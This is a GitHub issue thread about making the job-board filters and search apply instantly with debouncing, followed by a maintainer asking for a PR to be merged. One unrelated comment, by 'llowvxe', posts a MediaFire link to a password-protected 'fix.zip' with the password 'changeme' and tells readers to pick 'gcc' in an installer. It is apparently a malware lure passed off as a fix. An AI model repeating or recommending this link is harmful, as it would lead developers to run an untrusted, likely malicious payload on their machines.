### ISSUE TITLE
✨ Improvement: Improve UX for filters on job page

### ISSUE THREAD

**Issue by myj009** [code100x/job-board#267]
### 📜 Description

Currently, when using the filters on the job page, the user needs to click on the submit button to get the list of jobs with the filter applied. The UX can be improved by an instant call to the backend whenever a filter is changed and can get rid of the apply filters button
Additionally, in the search bar, we can use debouncing to call the backend and get rid of the search button

### 👟 Reproduction steps

Go to the jobs page - /jobs
Try to apply the filters or search for something. You will have to click on the search/apply filters button for the filters to be applied

### 👍 Expected behaviour

The filters should apply automatically without the need to click on the buttons

### 👀 Have you spent some time to check if this bug has been raised before?

- [X] I checked and didn't find similar issue

### 🏢 Have you read the Contributing Guidelines?

- [X] I have read the [Contributing Guidelines](https://github.com/code100x/job-board/blob/main/CONTRIBUTING.md)

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by myj009** [comment]
@VineeTagarwaL-code 
I have the PR ready. Can we merge this?
